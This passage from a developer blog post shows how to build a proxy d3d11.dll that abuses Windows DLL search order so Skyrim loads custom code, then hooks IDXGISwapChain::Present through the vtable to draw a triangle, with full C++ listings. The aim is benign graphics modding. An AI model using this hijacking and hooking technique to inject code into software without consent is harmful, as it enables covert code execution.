The blog of Kyle Halladay2021-07-13T03:56:09+00:00http://kylehalladay.comKyle Halladayk.mj.halladay@gmail.comHooking and Hijacking DirectX 11 Functions In Skyrim2021-07-14T00:00:00+00:00http://kylehalladay.com/blog/2021/07/14/Dll-Search-Order-Hijacking-For-PostProcess-Injection<style>
.collapsible {
padding: 10px;
background-color: #F0F0F0;
border-style: solid;
border-color: #333333;
border-width: 1px;
}
.collapsewrapper2 {
padding: 0px 0px 18px 0px;
}
</style>
<p>My last post was a deep dive into the nuts and bolts of how function hooking works, so for my next project I wanted to focus less on how hooking works, and more on how to use it to do something cool. I started looking at function hooking because I wanted to understand how <a href="https://reshade.me/">ReShade</a> works, so I decided that I’d take a baby step closer to that goal and draw a triangle across the screen in a real game. I’m a huge Skyrim fan, and it seemed like as good a candidate as any, so that’s what I went with.</p>
<p>This post is going to take it for granted that you already know how function hooking works. If you don’t, and that sounds interesting, see my <a href="/blog/2020/11/13/Hooking-By-Example.html">previous post</a>, or my <a href="https://github.com/khalladay/hooking-by-example">hooking-by-example</a> project.</p>
<div align="center">
<img src="/images/post_images/2021-07-14/skyrim_triangle.jpg" />
<font size="2">Note: you're looking for modern c++, clean code or best practices, turn back now</font>
<br /><br />
</div>
<p>As usual with things I write about, all the code for this project is up <a href="https://github.com/khalladay/triangle-injection">on github</a>, so if you just want to see the code, have at it!</p>
<h2 id="dll-hijacking-is-the-new-dll-injection">DLL Hijacking is the New DLL Injection</h2>
<p>I’ve built a few projects that have used process injection to get programs to run code they didn’t intend to, so for this project I decided to try something new. Instead of injecting a dll containing the code to draw a triangle, I decided to abuse Windows’ DLL search order to get Skyrim to load a dll full of my code during startup.</p>
<p>Whenever a program loads a DLL by name, it looks in a number of pre-set locations for that DLL, and loads the first one it finds. I knew that Skyrim uses DirectX 11 for it’s renderer, which means that it loads d3d11.dll during startup. My plan was to create my own dll, call it d3d11.dll, and place it in the same directory as Skyrim’s executable.</p>
<p>This dll would sit in between the game code and the real version of d3d11.dll. For functions I didn’t want to add any additional sauce to, my code would call the real dll’s version of that function and return the result. In cases where I wanted to add my own logic, I could intercept any function call I wanted and insert that logic before or after calling the real D3D11.dll’s function. DLLs that do this are called “proxy” dlls. This isn’t a new idea by any means, there’s tons of projects and literature out there for using proxy dlls for everything (including game hacking). Also I stole the idea from ReShade.</p>
<div align="center">
<img src="/images/post_images/2021-07-14/proxy_dll.png" />
<br /><br />
</div>
<p>Creating a proxy version of d3d11.dll that contains every function eported by the actual library is a chunk of work, but luckily I didn’t have to do that. Instead, I fired up <a href="https://ntcore.com/?page_id=388">CFF Explorer</a> and took a look at the functions Skyrim actually imports. It turns out this is just a single D3D11.dll export: D3D11CreateDeviceAndSwapChain. No complaints here.</p>
<p>I had never built a proxy dll before, so my first step was to make an empty one (with just a dllmain function), and see what happens if a progrma loads a dll that doesn’t have the functions it expects it to have. This works as well as you might expect. I put a call to MessageBox() in DLLMain to see if things even progressed that far. They didnt.</p>
<div align="center">
<img src="/images/post_images/2021-07-14/launching_with_dxgi_that_just_pops_messagebox.PNG" />
<font size="2">I changed my system's language to french once, some things have never changed back</font>
<br /><br />
</div>
<p>My next step was to try to write a proxy dll that didn’t do anything except forward all calls to D3D11CreateDeviceAndSwapChain to the real version of that function, and return the result. The goal here being that I could get Skyrim to load my dll (confirmed by a call to MessageBox in DLLMain), and run like normal. This is a relatively straightforward process. My .def file already declared that the proxy dll was exporting a function called D3D11CreateDeviceAndSwapChain, so all I had to do was create that function with the right type signature, and in the function body, load the real D3D11 library and call the real D3D11CreateDeviceAndSwapChain function.</p>
<figure class="highlight"><pre><code class="language-cpp" data-lang="cpp"><span class="k">typedef</span> <span class="nf">HRESULT</span><span class="p">(</span><span class="kr">__stdcall</span><span class="o">*</span> <span class="n">fn_D3D11CreateDeviceAndSwapChain</span><span class="p">)(</span>
<span class="n">IDXGIAdapter</span><span class="o">*</span><span class="p">,</span>
<span class="n">D3D_DRIVER_TYPE</span><span class="p">,</span>
<span class="n">HMODULE</span><span class="p">,</span>
<span class="n">UINT</span><span class="p">,</span>
<span class="k">const</span> <span class="n">D3D_FEATURE_LEVEL</span><span class="o">*</span><span class="p">,</span>
<span class="n">UINT</span><span class="p">,</span>
<span class="n">UINT</span><span class="p">,</span>
<span class="k">const</span> <span class="n">DXGI_SWAP_CHAIN_DESC</span><span class="o">*</span><span class="p">,</span>
<span class="n">IDXGISwapChain</span><span class="o">**</span><span class="p">,</span>
<span class="n">ID3D11Device</span><span class="o">**</span><span class="p">,</span>
<span class="n">D3D_FEATURE_LEVEL</span><span class="o">*</span><span class="p">,</span>
<span class="n">ID3D11DeviceContext</span><span class="o">**</span><span class="p">);</span>
<span class="n">fn_D3D11CreateDeviceAndSwapChain</span> <span class="nf">LoadD3D11AndGetOriginalFuncPointer</span><span class="p">()</span>
<span class="p">{</span>
<span class="kt">char</span> <span class="n">path</span><span class="p">[</span><span class="n">MAX_PATH</span><span class="p">];</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">GetSystemDirectoryA</span><span class="p">(</span><span class="n">path</span><span class="p">,</span> <span class="n">MAX_PATH</span><span class="p">))</span> <span class="k">return</span> <span class="nb">nullptr</span><span class="p">;</span>
<span class="n">strcat_s</span><span class="p">(</span><span class="n">path</span><span class="p">,</span> <span class="n">MAX_PATH</span> <span class="o">*</span> <span class="k">sizeof</span><span class="p">(</span><span class="kt">char</span><span class="p">),</span> <span class="s">"</span><span class="se">\\</span><span class="s">d3d11.dll"</span><span class="p">);</span>
<span class="n">HMODULE</span> <span class="n">d3d_dll</span> <span class="o">=</span> <span class="n">LoadLibraryA</span><span class="p">(</span><span class="n">path</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">d3d_dll</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">MessageBox</span><span class="p">(</span><span class="nb">NULL</span><span class="p">,</span> <span class="n">TEXT</span><span class="p">(</span><span class="s">"Could Not Locate Original D3D11 DLL"</span><span class="p">),</span> <span class="n">TEXT</span><span class="p">(</span><span class="s">"Darn"</span><span class="p">),</span> <span class="mi">0</span><span class="p">);</span>
<span class="k">return</span> <span class="nb">nullptr</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">return</span> <span class="p">(</span><span class="n">fn_D3D11CreateDeviceAndSwapChain</span><span class="p">)</span><span class="n">GetProcAddress</span><span class="p">(</span><span class="n">d3d_dll</span><span class="p">,</span> <span class="n">TEXT</span><span class="p">(</span><span class="s">"D3D11CreateDeviceAndSwapChain"</span><span class="p">));</span>
<span class="p">}</span>
<span class="k">extern</span> <span class="s">"C"</span> <span class="n">HRESULT</span> <span class="kr">__stdcall</span> <span class="nf">D3D11CreateDeviceAndSwapChain</span><span class="p">(</span>
<span class="n">IDXGIAdapter</span> <span class="o">*</span> <span class="n">pAdapter</span><span class="p">,</span>
<span class="n">D3D_DRIVER_TYPE</span> <span class="n">DriverType</span><span class="p">,</span>
<span class="n">HMODULE</span> <span class="n">Software</span><span class="p">,</span>
<span class="n">UINT</span> <span class="n">Flags</span><span class="p">,</span>
<span class="k">const</span> <span class="n">D3D_FEATURE_LEVEL</span> <span class="o">*</span> <span class="n">pFeatureLevels</span><span class="p">,</span>
<span class="n">UINT</span> <span class="n">FeatureLevels</span><span class="p">,</span>
<span class="n">UINT</span> <span class="n">SDKVersion</span><span class="p">,</span>
<span class="k">const</span> <span class="n">DXGI_SWAP_CHAIN_DESC</span> <span class="o">*</span> <span class="n">pSwapChainDesc</span><span class="p">,</span>
<span class="n">IDXGISwapChain</span> <span class="o">*</span> <span class="o">*</span><span class="n">ppSwapChain</span><span class="p">,</span>
<span class="n">ID3D11Device</span> <span class="o">*</span> <span class="o">*</span><span class="n">ppDevice</span><span class="p">,</span>
<span class="n">D3D_FEATURE_LEVEL</span> <span class="o">*</span> <span class="n">pFeatureLevel</span><span class="p">,</span>
<span class="n">ID3D11DeviceContext</span> <span class="o">*</span> <span class="o">*</span><span class="n">ppImmediateContext</span>
<span class="p">)</span>
<span class="p">{</span>
<span class="n">fn_D3D11CreateDeviceAndSwapChain</span> <span class="n">D3D11CreateDeviceAndSwapChain_Orig</span> <span class="o">=</span> <span class="n">LoadD3D11AndGetOriginalFuncPointer</span><span class="p">();</span>
<span class="n">HRESULT</span> <span class="n">res</span> <span class="o">=</span> <span class="n">D3D11CreateDeviceAndSwapChain_Orig</span><span class="p">(</span>
<span class="n">pAdapter</span><span class="p">,</span>
<span class="n">DriverType</span><span class="p">,</span>
<span class="n">Software</span><span class="p">,</span>
<span class="n">Flags</span><span class="p">,</span>
<span class="n">pFeatureLevels</span><span class="p">,</span>
<span class="n">FeatureLevels</span><span class="p">,</span>
<span class="n">SDKVersion</span><span class="p">,</span>
<span class="n">pSwapChainDesc</span><span class="p">,</span>
<span class="n">ppSwapChain</span><span class="p">,</span>
<span class="n">ppDevice</span><span class="p">,</span>
<span class="n">pFeatureLevel</span><span class="p">,</span>
<span class="n">ppImmediateContext</span><span class="p">);</span>
<span class="k">return</span> <span class="n">res</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">BOOL</span> <span class="n">WINAPI</span> <span class="nf">DllMain</span><span class="p">(</span><span class="n">HINSTANCE</span> <span class="n">hinstDLL</span><span class="p">,</span> <span class="n">DWORD</span> <span class="n">ul_reason_for_call</span><span class="p">,</span> <span class="n">LPVOID</span> <span class="n">lpvReserved</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">ul_reason_for_call</span> <span class="o">==</span> <span class="n">DLL_PROCESS_ATTACH</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">MessageBox</span><span class="p">(</span><span class="nb">NULL</span><span class="p">,</span> <span class="n">TEXT</span><span class="p">(</span><span class="s">"Loaded Proxy DLL"</span><span class="p">),</span> <span class="n">TEXT</span><span class="p">(</span><span class="s">"Success"</span><span class="p">),</span> <span class="mi">0</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">return</span> <span class="nb">true</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>Pasting the dll created with the code next to the Skyrim binary (for me: C:\Program Files (x86)\Steam\steamapps\common\Skyrim Special Edition) and then launching the game through Steam successfully popped the message box, and proceeded to play like normal. Perfect.</p>
<h2 id="finding-a-function-to-hook">Finding A Function To Hook</h2>
<p>Now that I had my proxy dll minimally working, it was time to use it to do something interesting. I figured it would be pretty easy to add some more code to D3D11CreateDeviceAndSwapChain to set up all the buffers and shaders needed to render a triangle, and then intercept a call to IDXGISwapchain::Present to insert a draw call for that triangle at the end of a frame. There was just one small problem: I had no idea what the address of IDXGISwapchain::Present was, and this is where things take a turn for the hacky.</p>
<p>IDXGISwapChain isn’t really a class, it’s a COM interface. The ppSwapChain pointer returned by D3D11CreateDeviceAndSwapChain is a pointer to <em>something</em> that implements said interface, but you never get to see the actual concrete type pointed to by that pointer, so I couldn’t just make a function pointer to the concrete implementation of Present(). The one saving grace in all this is that i knew that whatever ppSwapChain pointed to, it had a vtable. Somewhere in memory, I already had a pointer to the Present function, I just needed to figure out how to get it.</p>
<p>First, I needed to get a pointer to the vtable for the swapchain that gets created by the call to CreateDeviceAndSwapChain. This meant adding the following perfectly reasonable line of code to my proxy CreateDeviceAndSwapChain function (right before the return statement):</p>
<figure class="highlight"><pre><code class="language-cpp" data-lang="cpp"><span class="kt">void</span><span class="o">**</span> <span class="n">swapChainVTable</span> <span class="o">=</span> <span class="o">*</span><span class="k">reinterpret_cast</span><span class="o"><</span><span class="kt">void</span><span class="o">***></span><span class="p">(</span><span class="o">*</span><span class="n">ppSwapChain</span><span class="p">);</span> </code></pre></figure>
<p>Then I threw a breakpoint right after that line so I could see the value of swapChainVTable in the VS debugger. By itself, this isn’t super helpful, since it’s just a pointer to the first element in the vtable, but in the course of doing this I learned a new Visual Studio trick to help out here. If you add a watch for a variable, and then add a suffix to the name of that watch like “, 50”, Visual Studio will give you a debug view that assumes swapChainVTable is a pointer to an array, and show you the next 50 elements in that array. So I created a watch for “swapChainVTable,50” which showed me the first 50 pointers in the swapchain object’s vtable.</p>
<div align="center">
<img src="/images/post_images/2021-07-14/nosymbol_watchwindow.png" />
<br /><br />
</div>
<p>This by itself wasn’t be the most useful (although I guess I could have figured out the right function by trial and error). Microsoft publishes the symbols for D3D11.dll though, so I had VS grab those from the Microsoft symbol server and used them to get the function names that corresponded with the vtable memory addresses. Once I had that, I could see that the Present function is the 9th element in swapChain vtable.</p>
<p><del>Of course, Microsoft could update DXGI and change the ordering of function in the vtable at any time, but it works for now, so yolo. </del> [Edit: As @__silent_ pointed out <a href="https://twitter.com/__silent_/status/1414704439693398023">on twitter</a>, this is rather unlikely, since it would require a whole new DXGI SwapChain interface that didn’t inherit from any previous versions of IDXGISwapChain]</p>
<div align="center">
<img src="/images/post_images/2021-07-14/symbolicated_watchwindow.png" />
<br /><br />
</div>
<p>Once I had the actual address, I could re-use the hooking code from my last post and redirect all calls to Present to my own function, which I could use to issue a draw call for the custom triangle prior to actually calling Present().</p>
<figure class="highlight"><pre><code class="language-cpp" data-lang="cpp"><span class="n">HRESULT</span> <span class="nf">DXGISwapChain_Present_Hook</span><span class="p">(</span><span class="n">IDXGISwapChain</span><span class="o">*</span> <span class="n">thisPtr</span><span class="p">,</span> <span class="n">UINT</span> <span class="n">SyncInterval</span><span class="p">,</span> <span class="n">UINT</span> <span class="n">Flags</span><span class="p">)</span>
<span class="p">{</span>
<span class="c1">//triangle drawing code will go here</span>
<span class="c1">//this is a specific quirk of my hooking code,</span>
<span class="c1">//the address for the function being hooked is stored in a thread-local stack,</span>
<span class="c1">//Getting the address of the original function means calling PopAddress.</span>
<span class="c1">//more details in the "Hooking By Example" project on my github</span>
<span class="n">fn_DXGISwapChain_Present</span> <span class="n">DXGISwapChain_Present_Orig</span><span class="p">;</span>
<span class="n">PopAddress</span><span class="p">(</span><span class="kt">uint64_t</span><span class="p">(</span><span class="o">&</span><span class="n">DXGISwapChain_Present_Orig</span><span class="p">));</span>
<span class="c1">//actuall call Present</span>
<span class="n">HRESULT</span> <span class="n">r</span> <span class="o">=</span> <span class="n">DXGISwapChain_Present_Orig</span><span class="p">(</span><span class="n">thisPtr</span><span class="p">,</span> <span class="n">SyncInterval</span><span class="p">,</span> <span class="n">Flags</span><span class="p">);</span>
<span class="k">return</span> <span class="n">r</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">extern</span> <span class="s">"C"</span> <span class="n">HRESULT</span> <span class="kr">__stdcall</span> <span class="nf">D3D11CreateDeviceAndSwapChain</span><span class="p">(</span>
<span class="n">IDXGIAdapter</span> <span class="o">*</span> <span class="n">pAdapter</span><span class="p">,</span>
<span class="n">D3D_DRIVER_TYPE</span> <span class="n">DriverType</span><span class="p">,</span>
<span class="n">HMODULE</span> <span class="n">Software</span><span class="p">,</span>
<span class="n">UINT</span> <span class="n">Flags</span><span class="p">,</span>
<span class="k">const</span> <span class="n">D3D_FEATURE_LEVEL</span> <span class="o">*</span> <span class="n">pFeatureLevels</span><span class="p">,</span>
<span class="n">UINT</span> <span class="n">FeatureLevels</span><span class="p">,</span>
<span class="n">UINT</span> <span class="n">SDKVersion</span><span class="p">,</span>
<span class="k">const</span> <span class="n">DXGI_SWAP_CHAIN_DESC</span> <span class="o">*</span> <span class="n">pSwapChainDesc</span><span class="p">,</span>
<span class="n">IDXGISwapChain</span> <span class="o">*</span> <span class="o">*</span><span class="n">ppSwapChain</span><span class="p">,</span>
<span class="n">ID3D11Device</span> <span class="o">*</span> <span class="o">*</span><span class="n">ppDevice</span><span class="p">,</span>
<span class="n">D3D_FEATURE_LEVEL</span> <span class="o">*</span> <span class="n">pFeatureLevel</span><span class="p">,</span>
<span class="n">ID3D11DeviceContext</span> <span class="o">*</span> <span class="o">*</span><span class="n">ppImmediateContext</span>
<span class="p">)</span>
<span class="p">{</span>
<span class="n">fn_D3D11CreateDeviceAndSwapChain</span> <span class="n">D3D11CreateDeviceAndSwapChain_Orig</span> <span class="o">=</span> <span class="n">LoadD3D11AndGetOriginalFuncPointer</span><span class="p">();</span>
<span class="n">HRESULT</span> <span class="n">res</span> <span class="o">=</span> <span class="n">D3D11CreateDeviceAndSwapChain_Orig</span><span class="p">(</span><span class="n">pAdapter</span><span class="p">,</span> <span class="n">DriverType</span><span class="p">,</span> <span class="n">Software</span><span class="p">,</span> <span class="n">Flags</span><span class="p">,</span> <span class="n">pFeatureLevels</span><span class="p">,</span> <span class="n">FeatureLevels</span><span class="p">,</span> <span class="n">SDKVersion</span><span class="p">,</span> <span class="n">pSwapChainDesc</span><span class="p">,</span> <span class="n">ppSwapChain</span><span class="p">,</span> <span class="n">ppDevice</span><span class="p">,</span> <span class="n">pFeatureLevel</span><span class="p">,</span> <span class="n">ppImmediateContext</span><span class="p">);</span>
<span class="kt">void</span><span class="o">**</span> <span class="n">swapChainVTable</span> <span class="o">=</span> <span class="o">*</span><span class="k">reinterpret_cast</span><span class="o"><</span><span class="kt">void</span><span class="o">***></span><span class="p">(</span><span class="o">*</span><span class="n">ppSwapChain</span><span class="p">);</span>
<span class="c1">//redirects calls to swapChainVTable[8] to DXGISwapChain_Present_Hook</span>
<span class="c1">//for more details about hooking, see my previous blog post</span>
<span class="n">InstallHook</span><span class="p">(</span><span class="n">swapChainVTable</span><span class="p">[</span><span class="mi">8</span><span class="p">],</span> <span class="n">DXGISwapChain_Present_Hook</span><span class="p">);</span>
<span class="k">return</span> <span class="n">res</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<h2 id="actually-drawing-a-triangle">Actually Drawing a Triangle</h2>
<p>Once I had the IDXGISwapChain::Present hook working, the rest of this project fell into place pretty quickly. I added all the normal D3D11 calls for creating a mesh, compiling shaders, etc to CreateDeviceAndSwapChain (after device creation), and then added the draw commands for the triangle to the Present hook, before having that hook call the regular Present function. Rather than try to shove hlsl code in my cpp files, I just had the code look for a folder called “hook_content” in the same directory as the hooked binary, and load the shaders from there. Yet another idea I stole from <a href="https://reshade.me/">ReShade</a>.</p>
<p>The resulting code is simple enough to be a D3D11 tutorial project, so I’m just going to paste it below for reference and not waste much time talking about it. I’ve also included all the hooking code too. As mentioned, the entire project (including the test d3d11 app I built) is also <a href="https://github.com/khalladay/triangle-injection">on github</a>.</p>
<div class="collapsewrapper2">
<details class="collapsible">
<summary>Full DX11 Hooking Code (Click To Expand)</summary>
<figure class="highlight"><pre><code class="language-cpp" data-lang="cpp"><span class="cp">#pragma once
#include <Windows.h>
#include "debug.h"
#include <stdint.h>
#include <d3dcompiler.h>
#include <d3d11.h>
#include <d3d11_4.h>
#include <shlwapi.h>
#include "hooking.h"
</span>
<span class="cp">#pragma comment (lib, "Shlwapi.lib") //for PathRemoveFileSpecA
#pragma comment(lib, "d3dcompiler.lib")
</span>
<span class="k">typedef</span> <span class="nf">HRESULT</span><span class="p">(</span><span class="kr">__stdcall</span><span class="o">*</span> <span class="n">fn_D3D11CreateDeviceAndSwapChain</span><span class="p">)(</span>
<span class="n">IDXGIAdapter</span><span class="o">*</span><span class="p">,</span>
<span class="n">D3D_DRIVER_TYPE</span><span class="p">,</span>
<span class="n">HMODULE</span><span class="p">,</span>
<span class="n">UINT</span><span class="p">,</span>
<span class="k">const</span> <span class="n">D3D_FEATURE_LEVEL</span><span class="o">*</span><span class="p">,</span>
<span class="n">UINT</span><span class="p">,</span>
<span class="n">UINT</span><span class="p">,</span>
<span class="k">const</span> <span class="n">DXGI_SWAP_CHAIN_DESC</span><span class="o">*</span><span class="p">,</span>
<span class="n">IDXGISwapChain</span><span class="o">**</span><span class="p">,</span>
<span class="n">ID3D11Device</span><span class="o">**</span><span class="p">,</span>
<span class="n">D3D_FEATURE_LEVEL</span><span class="o">*</span><span class="p">,</span>
<span class="n">ID3D11DeviceContext</span><span class="o">**</span><span class="p">);</span>
<span class="k">typedef</span> <span class="nf">HRESULT</span><span class="p">(</span><span class="kr">__stdcall</span><span class="o">*</span> <span class="n">fn_DXGISwapChain_Present</span><span class="p">)(</span><span class="n">IDXGISwapChain</span><span class="o">*</span><span class="p">,</span> <span class="n">UINT</span><span class="p">,</span> <span class="n">UINT</span><span class="p">);</span>
<span class="n">IDXGISwapChain</span><span class="o">*</span> <span class="n">swapChain</span> <span class="o">=</span> <span class="nb">nullptr</span><span class="p">;</span>
<span class="n">ID3D11Device5</span><span class="o">*</span> <span class="n">device</span> <span class="o">=</span> <span class="nb">nullptr</span><span class="p">;</span>
<span class="n">ID3D11DeviceContext4</span><span class="o">*</span> <span class="n">devCon</span> <span class="o">=</span> <span class="nb">nullptr</span><span class="p">;</span>
<span class="n">ID3D10Blob</span><span class="o">*</span> <span class="n">vs_blob</span> <span class="o">=</span> <span class="nb">nullptr</span><span class="p">;</span>
<span class="n">ID3D11VertexShader</span><span class="o">*</span> <span class="n">vs</span> <span class="o">=</span> <span class="nb">nullptr</span><span class="p">;</span>
<span class="n">ID3D10Blob</span><span class="o">*</span> <span class="n">ps_blob</span> <span class="o">=</span> <span class="nb">nullptr</span><span class="p">;</span>
<span class="n">ID3D11PixelShader</span><span class="o">*</span> <span class="n">ps</span> <span class="o">=</span> <span class="nb">nullptr</span><span class="p">;</span>
<span class="n">ID3D11Buffer</span><span class="o">*</span> <span class="n">vertex_buffer</span> <span class="o">=</span> <span class="nb">nullptr</span><span class="p">;</span>
<span class="n">ID3D11InputLayout</span><span class="o">*</span> <span class="n">vertLayout</span> <span class="o">=</span> <span class="nb">nullptr</span><span class="p">;</span>
<span class="n">ID3D11RasterizerState</span><span class="o">*</span> <span class="n">SolidRasterState</span> <span class="o">=</span> <span class="nb">nullptr</span><span class="p">;</span>
<span class="n">ID3D11DepthStencilState</span><span class="o">*</span> <span class="n">SolidDepthStencilState</span> <span class="o">=</span> <span class="nb">nullptr</span><span class="p">;</span>
<span class="n">HRESULT</span> <span class="nf">DXGISwapChain_Present_Hook</span><span class="p">(</span><span class="n">IDXGISwapChain</span><span class="o">*</span> <span class="n">thisPtr</span><span class="p">,</span> <span class="n">UINT</span> <span class="n">SyncInterval</span><span class="p">,</span> <span class="n">UINT</span> <span class="n">Flags</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">devCon</span><span class="o">-></span><span class="n">VSSetShader</span><span class="p">(</span><span class="n">vs</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
<span class="n">devCon</span><span class="o">-></span><span class="n">PSSetShader</span><span class="p">(</span><span class="n">ps</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
<span class="n">devCon</span><span class="o">-></span><span class="n">IASetInputLayout</span><span class="p">(</span><span class="n">vertLayout</span><span class="p">);</span>
<span class="n">devCon</span><span class="o">-></span><span class="n">RSSetState</span><span class="p">(</span><span class="n">SolidRasterState</span><span class="p">);</span>
<span class="n">devCon</span><span class="o">-></span><span class="n">OMSetDepthStencilState</span><span class="p">(</span><span class="n">SolidDepthStencilState</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
<span class="n">UINT</span> <span class="n">stride</span> <span class="o">=</span> <span class="k">sizeof</span><span class="p">(</span><span class="kt">float</span><span class="p">)</span> <span class="o">*</span> <span class="mi">6</span><span class="p">;</span>
<span class="n">UINT</span> <span class="n">offset</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="n">devCon</span><span class="o">-></span><span class="n">IASetVertexBuffers</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="o">&</span><span class="n">vertex_buffer</span><span class="p">,</span> <span class="o">&</span><span class="n">stride</span><span class="p">,</span> <span class="o">&</span><span class="n">offset</span><span class="p">);</span>
<span class="n">devCon</span><span class="o">-></span><span class="n">IASetPrimitiveTopology</span><span class="p">(</span><span class="n">D3D11_PRIMITIVE_TOPOLOGY_TRIANGLELIST</span><span class="p">);</span>
<span class="n">devCon</span><span class="o">-></span><span class="n">Draw</span><span class="p">(</span><span class="mi">3</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
<span class="n">fn_DXGISwapChain_Present</span> <span class="n">DXGISwapChain_Present_Orig</span><span class="p">;</span>
<span class="n">PopAddress</span><span class="p">(</span><span class="kt">uint64_t</span><span class="p">(</span><span class="o">&</span><span class="n">DXGISwapChain_Present_Orig</span><span class="p">));</span>
<span class="n">HRESULT</span> <span class="n">r</span> <span class="o">=</span> <span class="n">DXGISwapChain_Present_Orig</span><span class="p">(</span><span class="n">thisPtr</span><span class="p">,</span> <span class="n">SyncInterval</span><span class="p">,</span> <span class="n">Flags</span><span class="p">);</span>
<span class="k">return</span> <span class="n">r</span><span class="p">;</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">LoadShaders</span><span class="p">()</span>
<span class="p">{</span>
<span class="p">{</span>
<span class="kt">char</span> <span class="n">filepath</span><span class="p">[</span><span class="mi">512</span><span class="p">];</span>
<span class="n">HMODULE</span> <span class="n">hModule</span> <span class="o">=</span> <span class="n">GetModuleHandle</span><span class="p">(</span><span class="nb">NULL</span><span class="p">);</span>
<span class="n">GetModuleFileNameA</span><span class="p">(</span><span class="n">hModule</span><span class="p">,</span> <span class="n">filepath</span><span class="p">,</span> <span class="mi">512</span><span class="p">);</span>
<span class="n">PathRemoveFileSpecA</span><span class="p">(</span><span class="n">filepath</span><span class="p">);</span>
<span class="n">strcat_s</span><span class="p">(</span><span class="n">filepath</span><span class="p">,</span> <span class="mi">512</span><span class="p">,</span> <span class="s">"</span><span class="se">\\</span><span class="s">hook_content</span><span class="se">\\</span><span class="s">passthrough_vs.shader"</span><span class="p">);</span>
<span class="kt">wchar_t</span> <span class="n">wPath</span><span class="p">[</span><span class="mi">513</span><span class="p">];</span>
<span class="kt">size_t</span> <span class="n">outSize</span><span class="p">;</span>
<span class="n">mbstowcs_s</span><span class="p">(</span><span class="o">&</span><span class="n">outSize</span><span class="p">,</span> <span class="o">&</span><span class="n">wPath</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="n">strlen</span><span class="p">(</span><span class="n">filepath</span><span class="p">)</span> <span class="o">+</span> <span class="mi">1</span><span class="p">,</span> <span class="n">filepath</span><span class="p">,</span> <span class="n">strlen</span><span class="p">(</span><span class="n">filepath</span><span class="p">));</span>
<span class="n">ID3D10Blob</span><span class="o">*</span> <span class="n">compileErrors</span> <span class="o">=</span> <span class="nb">nullptr</span><span class="p">;</span>
<span class="n">HRESULT</span> <span class="n">err</span> <span class="o">=</span> <span class="n">D3DCompileFromFile</span><span class="p">(</span><span class="n">wPath</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="s">"main"</span><span class="p">,</span> <span class="s">"vs_5_0"</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="o">&</span><span class="n">vs_blob</span><span class="p">,</span> <span class="o">&</span><span class="n">compileErrors</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="n">compileErrors</span> <span class="o">!=</span> <span class="nb">nullptr</span> <span class="o">&&</span> <span class="n">compileErrors</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">ID3D10Blob</span><span class="o">*</span> <span class="n">outErrorsDeref</span> <span class="o">=</span> <span class="n">compileErrors</span><span class="p">;</span>
<span class="n">OutputDebugStringA</span><span class="p">((</span><span class="kt">char</span><span class="o">*</span><span class="p">)</span><span class="n">compileErrors</span><span class="o">-></span><span class="n">GetBufferPointer</span><span class="p">());</span>
<span class="p">}</span>
<span class="n">err</span> <span class="o">=</span> <span class="n">device</span><span class="o">-></span><span class="n">CreateVertexShader</span><span class="p">(</span><span class="n">vs_blob</span><span class="o">-></span><span class="n">GetBufferPointer</span><span class="p">(),</span> <span class="n">vs_blob</span><span class="o">-></span><span class="n">GetBufferSize</span><span class="p">(),</span> <span class="nb">NULL</span><span class="p">,</span> <span class="o">&</span><span class="n">vs</span><span class="p">);</span>
<span class="n">check</span><span class="p">(</span><span class="n">err</span> <span class="o">==</span> <span class="n">S_OK</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">{</span>
<span class="kt">char</span> <span class="n">filepath</span><span class="p">[</span><span class="mi">512</span><span class="p">];</span>
<span class="n">HMODULE</span> <span class="n">hModule</span> <span class="o">=</span> <span class="n">GetModuleHandle</span><span class="p">(</span><span class="nb">NULL</span><span class="p">);</span>
<span class="n">GetModuleFileNameA</span><span class="p">(</span><span class="n">hModule</span><span class="p">,</span> <span class="n">filepath</span><span class="p">,</span> <span class="mi">512</span><span class="p">);</span>
<span class="n">PathRemoveFileSpecA</span><span class="p">(</span><span class="n">filepath</span><span class="p">);</span>
<span class="n">strcat_s</span><span class="p">(</span><span class="n">filepath</span><span class="p">,</span> <span class="mi">512</span><span class="p">,</span> <span class="s">"</span><span class="se">\\</span><span class="s">hook_content</span><span class="se">\\</span><span class="s">vertex_color_ps.shader"</span><span class="p">);</span>
<span class="kt">wchar_t</span> <span class="n">wPath</span><span class="p">[</span><span class="mi">513</span><span class="p">];</span>
<span class="kt">size_t</span> <span class="n">outSize</span><span class="p">;</span>
<span class="n">mbstowcs_s</span><span class="p">(</span><span class="o">&</span><span class="n">outSize</span><span class="p">,</span> <span class="o">&</span><span class="n">wPath</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="n">strlen</span><span class="p">(</span><span class="n">filepath</span><span class="p">)</span> <span class="o">+</span> <span class="mi">1</span><span class="p">,</span> <span class="n">filepath</span><span class="p">,</span> <span class="n">strlen</span><span class="p">(</span><span class="n">filepath</span><span class="p">));</span>
<span class="n">ID3D10Blob</span><span class="o">*</span> <span class="n">compileErrors</span><span class="p">;</span>
